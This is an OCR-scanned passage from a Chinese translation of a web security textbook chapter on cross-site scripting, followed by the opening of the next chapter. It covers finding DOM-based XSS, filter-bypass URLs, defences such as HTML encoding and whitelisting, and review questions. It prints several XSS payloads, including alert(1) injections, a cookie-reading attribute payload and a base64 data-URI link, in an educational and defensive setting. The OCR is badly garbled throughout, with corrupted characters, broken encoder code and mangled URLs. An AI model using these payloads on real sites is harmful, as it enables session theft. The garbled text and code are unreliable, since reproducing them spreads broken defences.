每 一 种 可 能 的 XSS 攻 击 字 符 串 ， 这 种 基本 的 探查 方法 必然 会 遗漏 大 量 的 漏洞 。 

确定 基于 DOM 的 XSS 漏 洞 的 一 种 更 加 有 效 的 方法 ， 是 检查 所 有 客户 问 JavaScript， 看 其 中 是 
否 使 用 了 任何 可 能 会 导致 漏洞 的 DOM 属 性 。 有 大 量 工 具 可 用 于 自动 完成 这 个 测试 过 程 。 其 中 一 
个 有 用 的 工具 为 DOMTracer， 下载 该 工具 的 URL 如 下 所 示 : 


www.bluenfy.com/tools.html 

































































渗透 测试 步 又 


使 用 在 应 用 程序 解析 过 程 中 得 到 的 结 采 ( 请 参阅 第 4 曹 了 解 相关 内 容 )， 检 查 每 一 段 客户 端 











JavaScript, 看 其 中 是 否 出 现 以 下 API, 它 们 可 用 于 访问 通过 一 个 专门 设计 的 URL 控 制 的 DOM 数 据 : 

DD document .location 

DD document .URL 

D document .URLUnencoded 

DD document .referrer 

D windqow.1Location 

确保 检查 出 现在 神态 HTML 页 面 及 动态 生成 的 页 面 中 的 脚本 ,无 论 页 面 为 何 种 类 型 ,或 者 
是 否 有 参数 被 提交 给 页 面 ， 任 何 使 用 脚本 的 位 置 都 可 能 存在 基于 DOM 的 XSS 漏 洞 。 

在 每 一 个 使 用 上 述 API 的 位 置 ， 仔 细 检 查 那 里 的 代码 ， 确 定 应 用 程序 如 何 处 理 用 户 可 控制 
的 数据 ， 以 及 是 否 可 以 使 用 专门 设计 的 输入 来 执行 任意 JavaScript。 尤 其 注意 检查 并 测试 控制 
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的 数据 被 传送 至 以 下 任何 一 个 API 的 情况 : 
DD document .write() 
UD document .writeln() 
lqocument .Body inmerHeml 
DD eval() 
DD window.execScript() 
window.setInterval () 


UD window.setTimeout () 


http://mdsec.net/error/18/ 
http://mdsec.net/error/22/ 
http://mdsec.net/error/28/ 
http://mdsec.net/error/31/ 
http://mdsec.net/error/37/ 
http://mdsec.net/error/41/ 
http://mdsec.net/error/49/ 
http://mdsec.net/error/S3/ 
http://mdsec.net/error/S56/ 
http://mdsec.net/error/61/ 








和 查找 反射 与 保存 型 XSS 源 洞 时 一 样 ， 应 用 程序 可 能 会 执行 各 种 过 滤 ， 尝 试 阻止 相关 攻击 。 
通 第 ， 这些 过 滤 应 用 于 客户 问 ， 因 此 ， 可 以 直接 查看 其 确认 代码 ， 以 了 解 其 工作 机 制 ， 并 尝试 确 
定 任何 避 开 过 泪 的 方法 。 上 文 介绍 的 用 于 避 开 针对 反射 型 XSS 攻 击 的 过 泪 技 马 在 此 处 同样 适用 。 














尝试 访问 


http://mdsec.net/error/92/ 
http://mdsec.net/error/95/ 
http://mdsec.net/error/107/ 
http://mdsec.net/error/109/ 
http://mdsec.net/error/118/ 








某 些 情况 下 , 服务 右 问 应 用 程序 可 能 会 实施 虽 在 阻止 基于 DOM 的 XSS 攻 击 的 过 小。 即使 客户 
端 出 现 易 受 攻击 的 操作 ,服务 需 并 不 在 啊 应 中 返回 用 户 提 区 的 数据 , 但 是 URL 仍 然 被 提交 给 了 服 
务 器 ; 因此 ， 当 应 用 程序 检测 到 恶意 有 效 载荷 时 ， 它 会 对 数据 进行 确认 ， 且 不 会 返回 易 受 攻击 的 
客户 端 脚本 。 

如 果 遇 到 这 种 防御 , 渗透 测试 员 应 该 尝试 使 用 前 面 在 查找 反射 型 XSS 漏 洞 时 描述 的 每 一 种 可 

ee 测试 服务 妖 数 据 确 认 机 制 的 可 靠 性 。 除 这 些 攻击 外 ,还 有 几 种 专门 针对 

于 DOM 的 XSS 漏 洞 的 技巧 可 用 于 帮助 攻击 有 效 载 和 荷 避 开 服务 顺 端 确认 。 
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当 客 户 端 脚本 从 URL 中 提取 参数 值 时 ， 它 们 很 少将 查询 字符 串 正 确 解析 成 名 / 值 对 。 相 反 ，， 

它们 通 稼 会 在 URL 中 搜索 后 面 紧 跟着 等 号 (= ) 的 参数 名 称 ， 然 后 所 取出 等 号 以 后 百 到 URIL 续 

位 置 的 内 容 。 这 种 行为 能 够 以 两 种 方式 加 以 利用 : 

口 如 末 服 务 硕 根据 每 个 参数 而 不 是 整个 URL 应 用 确认 机 制 ， 那 么 可 以 将 有 歼 载 傈 插入 到 附 
加 在 易 受 攻击 的 参数 后 面 的 一 个 虚构 的 参数 中 。 例 如 : 


http://mAsec.net/error/76/Error,.ashx?message=Sorry%2c+ant+errorioccurr 








edtfoo=<script>alert (1}</script> 
这 时 ， 虚 构 的 参数 被 服务 融 忽 略 ， 因 此 不 会 受到 任何 过 滤 。 但 是 ， 因 为 客户 端 脚本 
在 查询 字符 串 中 搜索 message=， 并 提取 其 后 的 全 部 内 容 , 所 以 它 处 理 的 字符 串 中 正好 包 
含 该 有 效 载 傈 。 
口 如 果 服 务 絮 对 整个 URL 而 不 仪 仪 是 消息 参数 应 用 确认 机 制 ， 仍然 可 以 将 有 效 载 傈 插入 到 
HTML 片 断 字 符 # 的 右边 ， 从 而 避 开 过 滤 。 例 如 : 


http://mdsec.net/error/82/Error.ashx?rmessage=Sorry%®2c+an+errort 














occurred#<script>alert (1)</script> 

这 时 ， 乒 断 字 符 串 仍然 属于 URL 的 一 部 分 ， 因 此 被 保存 在 DOM 中 ， 并 由 吻 受 攻击 的 客 
户 端 脚本 处 理 。 但 是 ， 由 于 浏览 器 并 不 将 URL 中 的 片断 部 分 提交 给 服务 器 ， 因 此 攻击 字符 
串 不 会 传送 到 服务 俘 中 ， 因 而 不 会 被 任何 服务 表 端 过 滤 所 阻止 。 因 为 客户 站 脚本 提取 
message= 后 面 的 全 部 内 容 ， 所 以 有 效 载 何 仍然 被 复制 到 HTML 页 面 源 代 人 码 中 。 


尝试 访问 
http://mdsec.net/error/76/ 
http://mdsec.net/error/82/ 








| 错误 观点 “我 们 检查 每 个 用 户 请 求 中 是 否 存在 湾 入 式 脚本 标签 ， 因 此 不 可 能 受到 
XSS 攻 击 。 


除 避 开 过 滤 是 否 可 行 外 ， 现 在 可 以 找到 3 个 原因 证 明 这 种 看 法 并 不 正确 。 

口 在 一 些 XSS 漏 洞 中 ， 攻 击 者 控制 的 数据 被 直接 播 入 到 现 有 的 JavaScript 脚 本 中 ， 
此 攻击 者 不 需要 使 用 任何 脚本 标签 ， 或 采用 其 他 方法 引入 脚本 代码 。 在 其 他 
情况 下 , 仍然 不 需要 使 用 任何 脚本 标签 ， 只 需 注 入 一 个 包含 JavaScript 的 事件 处 


理 器 即 可 。 

口 如 果 应 用 程序 接受 通过 带 外 通道 传送 的 数据 ， 并 在 它 的 Web 界 面 中 显示 这 些 数 
据 ， 那 么 攻击 者 不 用 使 用 HTTP 提 交 任 何 恶 意 有 效 载荷 ， 就 可 以 利用 任何 保存 型 
XSS 漏 洞 。 

口 针对 基于 DOM 的 XSS 漏 洞 的 攻击 不 需要 向 服务 器 提交 任何 恶意 有 效 载 苛 。 如 果 
使 用 片断 技巧 ， 那 么 有 效 载 和 荷 将 始终 位 于 客户 端 。 
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一 些 应 用 程序 使 用 更 加 复杂 的 客户 端 脚 本 ,对 查询 字符 串 进 行 更 加 严格 的 解析 。 例如， 它 在 
URL 中 搜索 后 面 紧 跟着 等 号 的 参数 名 称 ， 然 后 提取 等 号 后 面 的 内 容 ， 直 到 遇 到 一 个 分 隅 符 ， 如 & 
或 #。 在 这 种 情况 下 ， 可 以 对 前 面 的 两 个 攻击 进行 如 下 修改 : 


http://mAdsec.net/error/79/Error.ashx?foomessage=-<script>alert (1)</script 














>&mMmMesSsSage=-Sorry%2c+tanterrortoccurred 


http://mAsec.net/error/79/FError.ashxi#tmessage=<script>alert (1}</script> 
在 这 两 个 示例 中 ， 第 一 个 message= 后 面 紧 跟 者 攻击 字符 串 ， 其 中 没有 任何 干扰 脚本 执行 的 
分 隅 符 ， 因 此 攻击 有 效 载 集 将 得 到 处理 ， 目 被 复制 到 HTML 页 面 源 代码 中 。 


尝试 访问 


http:/ mdsec.net/error79/ 














有 时 候 ， 基 于 DOM 的 数据 经 过 了 非常 复杂 的 处 理 ， 仅 通过 毅 态 审查 JavaScript 源 代码 可 能 很 
难 追 踩 用 户 控制 的 数据 采用 的 不 同 路 径 以 及 对 它 进 行 的 各 种 操作 。 在 这 种 情况 下 , 使 用 JavaScript 
调试 带动 态 监控 脚本 的 执行 情况 可 能 会 有 很 大 玫 助 。Firefox 浏 览 郁 的 FireBug 扩 展 是 一 亚 用 于 监 
探 客户 交代 码 与 内 容 的 优秀 调试 着 ,可 用 于 设置 断 点 、 监 视 感 兴趣 的 代码 与 数据 ， 为 我 们 了 解 复 
杂 脚 本 的 执行 过 程 提 供 了 极 大 的 便利 。 











© 错误 观点 “我 们 很 安全 ， 因 为 Web 应 用 程序 扫描 器 没有 发 现任 何 XSS 漏 洞 。” 
第 19 章 将 会 介绍 , 一 些 Web 应 用 程序 扫描 器 能 够 发 现 大 多 数 常见 的 漏洞 ,包括 XSS 


漏洞 。 但 是 ， 很 显然 ， 许 多 XSS 漏 洞 很 难 检测 出 来 ， 发 现 它 们 可 能 需要 进行 大 量 探查 
与 试验 。 就 目前 而 言 ， 还 没有 任何 自动 工具 能 够 准确 确定 所 有 这 些 漏洞 。 
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尽管 XSS 的 表现 形式 各 异 ， 利用 方法 各 不 相同 , 但 从 概念 上 讲 ， 防止 这 种 漏洞 实际 上 相当 简 
单 。 预防 它们 之 所 以 存在 困难 ,主要 在 于 我 们 无 法 确定 用 户 可 控制 的 数据 以 潜在 危险 的 方式 被 处 
理 的 每 一 种 情况 。 任 何 应 用 程序 页 面 都 会 处 理 并 显示 一 些 用 户 数据 。 除 核心 功能 外 ,错误 消息 与 
其 他 位 置 也 可 能 产生 漏洞 。 因 此 ，XSS 漏洞 普遍 存在 也 就 不 足 为 奇 了 , 即使 在 最 为 注重 安全 的 应 
用 程序 中 也 是 如 此 。 

由 于 造成 漏洞 的 原因 各 不 相同 ， 一 部 分 防御 方法 适用 于 反射 型 与 保存 型 XSS 漏 洞 ， 而 另 一 些 
则 适用 于 基于 DOM 的 XSS 漏 洞 。 























12.4.1 防止 反射 型 与 保存 型 XSS 漏 洞 
用 户 可 控制 的 数据 未 经 适当 确认 与 净化 就 被 复制 到 应 用 程序 响应 中 ， 这 是 造成 反射 型 与 保 
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存 型 XSS 漏 洞 的 根本 原因 。 由 于 数据 被 插入 到 一 个 HTML 页面 的 源 代 码 中 , 恶意 数据 就 会 干扰 这 
个 页 面 ， 不 仅 修 改 它 的 内 容 ， 还 会 破坏 它 的 结构 (影响 引用 字符 串 、 起 始 与 结束 标签 、 注 入 脚 
本 等 )。 

为 消除 反射 型 与 保存 型 XSS 漏 洞 ， 首 先 必 须 确 定 应 用 程序 中 用 户 可 控制 的 数据 被 复制 到 啊 应 
中 的 每 一 种 情形 。 这 包括 从 当前 请 求 中 复制 的 数据 以 及 用 户 之 前 输入 的 保存 在 应 用 程序 中 的 数 
据 ， 还 有 通过 向 外 通道 输入 的 数据 。 为 确保 确定 每 一 种 情形 ， 除 仔细 审查 应 用 程序 的 全 部 源 代码 
外 ,没有 其 他 更 好 的 办 法 。 

确定 所 有 可 能 存在 XSS 风 险 、 需 要 适当 进行 防御 的 操作 后 ， 需 要 采取 一 种 三 重 防御 方法 阻止 
漏洞 的 发 生 。 这 种 方法 由 以 下 3 个 因素 组 成 : 

口 确认 输入 ; 

口 确认 输出 ; 

口 消除 危险 的 插入 点 。 

如 果 应 用 程序 需要 允许 用 户 以 HTML 格 式 创建 内 容 ( 如 允许 在 注释 中 使 用 HTML 的 博客 应 用 
程序 )， 这 时 应 谨慎 使 用 这 种 方法 。 我 们 将 在 介绍 常规 防御 技巧 后 讨论 与 这 种 情况 有 关 的 一 些 特 
定 注意 事项 。 

1. 确认 输入 

如 果 应 用 程序 在 某 个 位 置 收 到 的 用 户 提交 的 数据 将 来 有 可 能 被 复制 到 它 的 啊 应 中 , 应 用 程序 
应 根据 这 种 情形 对 这 些 数 据 执行 尽 可 能 严格 的 确认 。 可 能 需要 确认 的 数据 的 特性 包括 以 下 几 点 。 

口 数据 不 是 太 长 。 

口 数据 仅 包含 某 组 合法 字符 。 

口 数据 与 一 个 特殊 的 正规 表达 式 相 匹配 。 

根据 应 用 程序 希望 在 每 个 字段 中 收 到 的 数据 类 型 ,应 尽 可 能 限制 性 地 对 姓名 、 电 子 邮件 地 址 、 
账号 等 应 用 不 同 的 确认 规则 。 

2. 确认 输出 

如 果 应 用 程序 将 某 位 用 户 或 第 三 方 提交 的 数据 复制 到 它 的 啊 应 中 , 那么 应 用 程序 应 对 这 些 数 
据 进 行 HTML 编 码 , 以 净化 可 能 的 恶意 字符 。HTML 编码 指 用 对 应 的 HTML 实 体 奉 代 字 面 量 字符 。 
这 样 做 可 确保 浏览 右 安 全 处理 可 能 为 恶意 的 字符 ， 把 它们 当做 HTML 文 档 的 内 容 而 非 结 构 处 理 。 
一 些 经 常 造成 问题 的 字符 的 HTML 编 码 如 下 : 








































































































DD"— &quot; 

UD'— &apos; 

DD& 一 -一 &amp; 

DD<— &lt:; 

口 > 一 -一 &gt 

除 这 些 常用 的 编码 外 , 实际 上 , 任何 字符 都 可 以 用 它 的 数字 ASCII 字 符 代码 进行 HTML 编 码 ， 
举例 如 下 : 


加 名 &#37; 
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口 * &#42 ; 

应 该 注意 ， 在 将 用 户 输入 插入 到 标签 属性 值 中 时 ， 浏 览 需 会 首先 对 该 值 进行 HTML 解 码 ， 然 
后 执行 其 他 处 理 。 在 这 种 情况 下 ,仅仅 对 任何 在 正常 情况 下 存在 问题 的 字符 进行 HTML 编 码 的 防 
御 机 制 可 能 会 失效 。 确 实 ， 如 前 所 述 ， 对 于 某 些 过 小， 攻击 者 可 以 避免 在 有 效 载 集 中 使 用 HTML 
编码 的 字 行 。 例 如 : 


<img src="jJavascript&#53;alert (document .cookie}) "> 




















<img src="image.gif" onload="alert (&apos; XsSsS&apos;) "> 

我 们 在 下 一 节 将 会 讲 到 , 最 好 是 避免 在 这 些 位 置 插入 用 户 可 控制 的 数据 。 如 果 在 某 些 情况 必 
须 这 样 做 ,在 执行 操作 时 应 特别 小 心 ， 以 防止 任何 可 以 避免 过 滤 的 情况 。 例 如 ， 如 果 将 用 户 输入 
插入 到 事件 处 理 器 中 的 引用 JavaScript 字 符 串 中 ,应 使 用 反 斜 线 正确 转 义 用 户 输入 中 的 任何 引号 或 
反 斜 线 ， 并 且 HTML 编 码 应 包括 & 和 ;字符 ， 以 防止 攻击 者 自己 执行 HTML 编 码 。 

在 将 用 户 可 控制 的 字符 串 复 制 到 服务 器 的 响应 中 之 前 ，ASPNET 应 用 程序 可 以 使 用 
Server .HTMLEncode API 兆 化 其 中 的 明 见 恶意 字符 。 这 个 API 把 字符 "& < 和 > 转换 成 它们 对 应 
的 HTML 实 体 ， 并 且 使 用 数字 形式 的 编码 转换 任何 大 于 0x7f 的 ASCII 字 符 。 

在 Java 平 台中 没有 与 之 等 效 的 API; 但 是 可 以 使 用 数据 形式 的 编码 构造 自己 的 等 效 方法 。 
例如 : 


public static String HTMLEncode (String s) 
{ 























StringBuffer out = new StringBuffer'().; 
for {int i = 0; i < s.length(); i++) 
{ 
char ¢ = s.charAt (1);: 
| 


| c=='g || c=='<' || c== > ) 
out.append{("g&#" + (int) CC + ";"); 
else out.append{c).; 
} 
return out,.toSstring{); 


} 

当 处 理 用 户 提 交 的 数据 时 , 开发 者 常常 会 犯 一 个 错误 ， 即 仅 对 在 特殊 情况 下 对 攻击 者 有 用 的 
字符 进行 HTML 编 码 。 例 如 ， 如 有 果 数 据 被 插入 到 一 个 双 引 号 引用 的 字符 串 中 ， 应 用 程序 可 能 只 编 
码 " 字 符 ;， 如 有 果 数 据 被 插入 到 一 个 没有 引号 的 标签 中 ， 应 用 程序 只 会 编 公 > 字符 。 这 种 方法 明显 
增加 了 攻击 者 避 开 确认 的 风险 。 攻击 者 党 第 利用 浏览 紫 接 受 无 效 HTML 与 JavaScript 的 弱点 ， 改变 
确认 情境 或 以 意外 的 方式 注入 代码 。 而 且 , 攻击 者 可 以 将 一 个 攻击 字符 串 分 布 到 几 个 可 控制 的 字 
段 中 ,利用 应 用 程序 对 每 个 字段 采用 的 不 同 过 滤 避 和 开 其 他 过 小 。 一 种 更 加 可 徘 的 方法 是 , 无论 数 
据 插 入 到 什么 地 方 , 始终 对 攻击 者 可 能 使 用 的 每 一 个 字符 进行 HTML 编 码 , 为 尽 可 能 地 确保 安全 ， 
开发 者 可 能 会 选择 HTML 编 码 每 一 个 非 学 母 数字 字符， 包括 空 日 符 。 这 种 方法 通 和 常会 显 闭 增 加 应 
用 程序 的 工作 压力 ， 同 时 给 任何 尝试 避 开 过 滤 的 攻击 设置 巨大 障碍 。 

应 用 程序 之 所 以 结合 使 用 输入 确认 与 输出 净化 , 原因 在 于 这 种 方法 能 够 提供 两 层 防 御 : 如 果 
其 中 一 层 被 攻破 ， 另 一 层 还 能 提供 一 些 保护 。 如 上 文 所 述 , 许多 执行 输入 与 输出 确认 的 过 滤 都 容 
易 被 攻破 。 绪 合 这 两 种 技巧 , 应 用 程序 就 能 够 获得 额外 的 保护 ， 即 使 攻击 者 发 现 其 中 一 种 过 滤 存 
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在 缺陷 , 为 一 种 过 滤 仍 然 能 够 阻止 他 实施 攻击 。 在 这 两 种 防御 中 , 输出 确认 更 为 重要 , 必 不 可 少 。 
实施 严格 的 输入 确认 应 被 视 为 一 种 次 要 故障 恢复 ( secondary failover )。 

当然 ， 当 设计 输入 与 输出 确认 机 制 时 , 我 们 应 特别 小 心 , 尽量 避免 任何 可 能 导致 攻击 者 避 开 确 
认 的 漏洞 。 尤 其 要 注意 的 是 , 应 在 实施 相关 规 冰 化 后 再 对 数据 进行 过 小 与 编码 , 而且 之 后 不 得 对 数 
据 实施 进一步 的 规范 化 。 应 用 程序 还 必须 保证 其 中 存在 的 空 字 蔬 不 会 对 它 的 确认 造成 任何 干扰 。 

3. 消除 危险 的 插入 点 

应 用 程序 页 面 中 有 一 些 位 置 , 在 这 里 插入 用 户 提 交 的 输入 就 会 造成 极 大 的 风险 ; 因此 ,开发 
者 应 力求 寻找 其 他 方法 执行 必要 的 功能 。 

应 尽量 避 倪 直接 在 现 有 的 JavaScript 中 插 和 人 用户 可 控制 的 数据 。 这 适用 于 <script> 标 签 中 的 
代码 , 也 适用 于 事件 处 理 硕 的 代码 。 如 有 果 应 用 程序 尝试 以 安全 的 方式 在 其 中 插入 数据 , 可 能 就 会 
使 攻击 者 有 机 会 避 开 它们 实施 的 防御 性 过 滤 。 一 旦 攻击 者 能 够 控制 提交 数据 的 插入 点 , 他 不 用 付 
出 多 大 努力 就 可 以 注入 任意 脚本 命令 ， 从 而 实施 恶意 操作 。 

如 果 标 签 属性 接受 URL 作 为 它 的 值 , 通常 应 用 程序 应 该 避免 朋 入 用 户 输 入 ,因为 各 种 技巧 也 
能 引入 脚本 代码 ， 包 括 伪 协 议 脚 本 人 处理 的 使 用 。 

如 果 攻 击 者 通过 插入 一 个 相关 指令 ,或 者 因为 应 用 程序 使 用 一 个 请 求 参数 指定 自选 的 字符 
集 ， 因 而 能 够 控制 应 用 程序 响应 的 编码 类 型 ， 那么 这 些 情况 也 应 该 加 以 避免 。 在 这 种 情况 下 ,在 
其 他 方面 经 过 精心 设计 的 输入 与 输出 过 滤 可 能 就 会 失效 ， 因 为 攻击 者 的 输入 进行 了 不 常见 的 编 
人 码 ， 以 致 上 述 过 波 并 不 将 其 视 为 恶意 输入 。 只 要 有 可 能 ,应 用 程序 应 在 它 的 啊 应 消息 头 中 明确 指 
定 一 种 编码 类 型 ， 禁 止 对 它 进行 任何 形式 的 修改 ， 并 确保 应 用 程序 的 XSS 过 滤 与 其 羔 容 。 例 如 . 

Content-Type: text/html; charset=ISO-8859-1 

4. 允许 有 限 的 HTML 

一 些 应 用 程序 需要 允许 用 户 以 HTML 格 式 提交 即将 插入 到 应 用 程序 啊 应 中 的 数据 。 例 如 ， 博 
客 应 用 程序 可 能 需要 允许 用 户 使 用 HTML 撰 写 博客 、 对 博客 使 用 格式 、 骸 入 链接 或 图 像 等 。 在 这 
种 情况 下 , 不 作 区 分 地 应 用 上 述 措施 将 会 导致 错误 。 用 户 的 HIML 标 记 将 在 啊 应 中 被 HTML 编码 ， 
此 作为 真实 的 标记 显示 在 屏幕 上 ， 而 不 是 以 所 需 的 格式 化 内 容 显 示 。 

为 安全 地 文 持 这 种 功能 ,应 用 程序 需要 保持 稳健 ,， 仅 允 许 有 限 的 HIML 子 集 ， 避 免 提 供 任何 
引入 脚本 代码 的 方法 。 这 包括 采用 一 种 日 名 单方 法 , 仅 人 允许 特定 的 标签 和 属性 。 成 功 做 到 这 一 点 
并 不 简单 ， 如 前 所 述 ， 攻 击 者 可 以 通过 各 种 方法 使 用 看 似 无 害 的 标签 来 执行 代码 。 

例如 ， 如 果 应 用 程序 允许 使 用 <b> 和 <i> 标 签 ， 但 并 不 限制 与 这 些 标签 一 起 使 用 的 属性 ， 则 
攻击 者 可 以 实施 以 下 攻击 : 


<b style=behavior:url (#default#time2) onbegin=alert(1})> 








































































































<1 onclick=alert (1)>Click here</i> 
此 外 , 如 有 果 应 用 程序 允许 使 用 看 似 安全 的 <a> 标 签 和 href 属 性 的 组 合 , 则 攻击 者 可 以 实施 以 
下 攻击 : 


<a href="data:text/html;base64,PHNJCcmIwdDShbGVydCoqxKTwvc2NyaXBOPg==">C1 
ick here</a> 
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有 各 种 框架 (如 OWASP AntiSamy 项 目 ) 可 用 于 确认 用 户 提 交 的 HTML 标 记 ， 以 确保 其 中 不 
包含 任何 执行 JavaScript 的 方法 。 建议 需要 允许 用 户 创建 有 限 HTML 的 开发 者 直接 使 用 某 个 成 熟 的 
框架 ,或 仔细 分 析 其 中 一 种 框架 ， 以 了 解 面临 的 各 种 相关 挑战 。 

或 者 ,也 可 以 采用 某 种 定制 的 中 间 标 记 声言， 允许 用 户 使 用 有 限 的 中 间 语 言 声 法 ,然后 由 应 
用 程序 对 其 进行 处 理 ， 以 生成 相应 的 HTML 标记 。 




















12.4.2 ”防止 基于 DOM 的 XSS 漏 洞 


很 明显 , 迄今 为 止 , 我 们 描述 的 防御 机 制 并 不 能 防止 基于 DOM 的 XSS 漏 洞 ， 因 为 造成 这 种 漏 
洞 并 不 需要 将 用 户 可 控制 的 数据 复制 到 服务 融 啊 应 中 。 

应 用 程序 应 尽量 避免 使 用 客户 端 脚本 处 理 DOM 数 据 并 把 它 插入 到 页 面 中 。 由 于 被 处 理 的 数据 
不 在 服务 圳 的 直接 控制 范围 内 ， 有 时 甚至 不 在 它 的 可 见 范围 内 ， 因 此 这 种 行为 存在 着 固有 的 风险 。 

如 果 无 法 避免 地 要 以 这 种 方式 使 用 客户 疹 脚 本， 我 们 可 以 通过 两 种 防御 方法 防止 基于 DOM 
的 XSS 漏 洞 ， 它 们 分 别 与 前 面 描述 的 防止 反射 型 XSS 漏 洞 时 使 用 的 输入 与 输出 确认 相对 应 。 

1. 确认 输入 

许多 时 候 ， 应 用 程序 可 以 对 它 处 理 的 数据 执行 严格 的 确认 。 确实， 在 这 方面 ， 客 户 并 确认 比 
服务 恬 端 确认 更 加 有 效 。 在 前 面 描 述 的 易 受 攻击 的 示例 中 , 我 们 可 以 通过 确认 将 要 插入 到 文档 中 
的 数据 仅 包 含 字 母 数字 字符 与 空白 符 ， 从 而 阻止 攻击 发 生 。 例 如 : 












































<SCript> 
var a = document .URL:; 
a = a.substring(a.indexOof ('message=") + 8, a.length): 


a = unescape (al);: 
var regex-/^{[A-Za-20-9+\s])*S$/; 
if {regex.test(a)) 
document .write(a); 
</Script> 


除 这 种 客户 端 控制 外 , 还 可 以 在 服务 器 端 对 URIL 数 据 进 行 严 格 的 确认 ， 实 施 深 层 防 御 ， 以 检 
测 利 用 基于 DOM 的 XSS 漏 洞 的 恶意 请 求 。 在 刚刚 说 明 的 同一 个 示例 中 , 应 用 程序 甚至 只 需 实施 服 
务 表 端 数据 确认 ， 通 过 确认 以 下 数据 来 阻止 攻击 : 

口 查询 字符 串 中 只 有 一 个 参数 ; 

口 参数 名 为 message (大 小 写 检查 ); 

口 参数 值 仪 包含 字母 数字 内容。 

实施 了 这 些 控制 后 ,客户 端 脚本 仍 有 必要 正确 解析 出 message 参 数 的 值 , 确保 其 中 并 不 包含 
任何 URL 卢 断 字 人 符 。 

2. 确认 输出 

与 防止 反射 型 XSS 漏 洞 时 一 样 , 在 将 用 户 可 控制 的 DOM 数 据 插 入 到 文档 之 前 , 应 用 程序 也 可 
以 对 它们 进行 HTML 编 码 。 这 样 就 可 以 将 各 种 危险 的 字符 与 表达 式 以 安全 的 方式 显示 在 页 面 中 。 
例如 ， 使 用 下 面 的 函数 即 可 在 客户 并 JavaScript 中 执行 HTML 编 码 : 























12.6 ”问题 365 


function sanitize (str,) 


{ 





var d = document.createBlement ('div'): 
d.appendChild(document.createTextNode {str)); 
return d.innerHTML:; 


) 
12.5 ”小结 


在 这 一 草 中 , 我 们 讨论 了 各 种 可 能 导致 XSS 调 洞 的 情形 ， 以 及 一 些 可 用 于 避 开 基于 过 滤 的 稼 
用 防御 机 制 的 方法 。 由 于 XSS 漏 洞 极为 和 常见， 因此， 测试 员 能 够 轻易 在 应 用 程序 中 发 现 可 供 利 用 
的 漏洞 。 但 是 , 如 果实 施 的 各 种 防御 机 制 迫使 测试 员 设 计 出 高 度 自 定义 的 输入 , 或 者 利用 HTML、 
JavaScript 或 VBSceript 的 某 些 鲜 为 人 知 的 特性 来 实施 成 功 的 攻击 ,这 时 ,XSS 将 会 更 加 引 人 关 注 ( 至 
少 从 人 研究 角度 看 的 确 如 此 )。 

下 一 章 将 以 此 为 基础 ， 并 进一步 讨论 大 量 导 致 用 户 遭 受 恶 意 攻 击 的 服务 硕 端 Web 应 用 程序 
湄 筒 。 




















12.6 ”问题 


欲 知 问题 答案 ， 请 访问 http:/mdsec.netwahh。 

(1) 在 应 用 程序 的 行为 中 ， 有 什么 “明显 特征 ”可 用 于 确定 大 多 效 XSS 漏 洞 ? 

(2) 假设 在 应 用 程序 未 通过 验证 的 功能 区 域 发现 了 一 个 反射 型 XSS 漏 洞 。 如 何 利 用 这 个 漏洞 
攻破 一 个 通过 验证 的 应 用 程序 会 话 ?” 请 想 出 两 种 不 同 的 方法 。 

(3) 假设 一 个 cookie 参 数 示 经 过 任何 过 滤 或 净化 就 被 复制 到 应 用 程序 的 啊 应 中 。 是否 可 以 利用 
这 种 行为 在 返回 的 页 面 中 注入 任意 JavaScript? 是 否 可 以 利用 这 种 行为 实施 攻击 其 他 用 户 的 XSS 
攻击 ? 

(4) 假设 在 仅 返 回 给 目 己 的 数据 中 发 现 了 保存 型 XSS 漏 洞 。 这 种 行为 是 否 存在 安全 缺陷 ? 

(5) 在 一 个 处 理 文件 附件 并 在 浏览 锅 中 显示 这 些 内 容 的 Web 邮 件 应 用 程序 中 ， 可 以 立即 确定 
哪 种 常见 的 漏洞 ? 

(6) 浏览 大 的 同 源 策 略 如 何 给 Ajax 技 术 XMLHttpRequest 的 应 用 造成 有 影响? 

(7) 列举 3 个 利用 XSS 汤 洞 的 可 行 攻击 有 效 载 傈 (也 就 是 说 ， 攻 击 者 可 以 在 其 他 用 户 的 浏览 38 
中 执行 的 恶意 操作 而 不 是 传送 攻击 的 方法 )。 

(8) 已 知 一 个 反射 型 XSS 漏 洞 ,， 可 以 在 返回 页 面 的 HTML 代 人 码 的 某 个 位 置 注入 任意 数 据 。 插入 
的 数据 被 截 短 至 50 字 和 , 但 是 我 们 而 望 注 入 一 个 超 长 的 脚本 , 并且 不 想 调 用 外 部 服务 硕 上 的 脚本 。 
如 何 解决 长 度 限制 呢 ? 

(9) 在 一 个 必须 使 用 PosT 方 法 的 请 求 中 发 现 一 个 反射 型 XSS 漏 洞 。 攻 击 者 可 以 使 用 哪 种 传送 
机 制 实施 攻击 ? 




































































在 前 一 草 中 ， 我 们 介绍 了 针对 其 他 应 用 程序 用 户 的 主要 攻击 一 一 览 站 点 脚本 〈《XSS )。 在 
这 一 章 中 ， 我 们 将 介绍 一 系列 针对 用 户 的 其 他 攻击 。 其 中 的 一 些 攻击 与 XSS 攻 击 具有 
很 大 的 相似 性 。 许 多 时 候 ， 这 些 攻击 比 XSS 更 加 复 杀 ， 或 者 辽 藏 性 更 蝇 ， 因 此 ， 在 单纯 的 XSS 攻 
击 无 法 稻 效 的 情况 下 ， 它 们 往往 能 够 取得 成 功 。 

针对 其 他 应 用 程序 用 户 的 攻击 形式 各 卉 ， 它 们 之 间 的 微妙 之 处 与 细微 差别 第 第 被 人 们 忽略 。 
通 前 ,与 主要 的 服务 骨 端 攻击 相 比 ， 人 们 对 它们 也 知之 甚 少 ,即使 经 验 丰 富 的 渗透 测试 员 也 会 混 
消 或 忽略 各 种 不 同 的 漏洞 。 我 们 将 在 本 革 中 介绍 各 种 第 见 的 源 洞 ,并 说 明确 认 并 利用 这 些 漏洞 所 
需 采 取 的 步 又 。 


13.1 诱 使 用 尸 执行 操作 


在 上 一 草 中 , 我 们 介绍 了 如 何 利 用 XSS 攻 击 族 使 用 户 在 不 知情 的 情况 下 在 应 用 程序 中 执行 操 
作 。 如 采 受 害 用 户 拥 有 管理 权限 ,使 用 这 种 技巧 就 可 以 迅速 完全 侵入 应 用 程序 。 在 这 一 下 中, 我 
们 将 介绍 为 外 一 些 可 用 于 话 使 其 他 用 户 执行 操作 的 方法 。 这 些 方法 甚至 可 以 用 在 已 防 邦 XSS 攻 击 
的 应 用 程序 中 。 


13.1.1 请 求 伪 造 


这 种 类 型 的 攻击 也 称 为 会 话 合 置 ( session riding )， 它 们 与 会 话 劫持 攻击 密切 相关 ， 在 攻击 过 
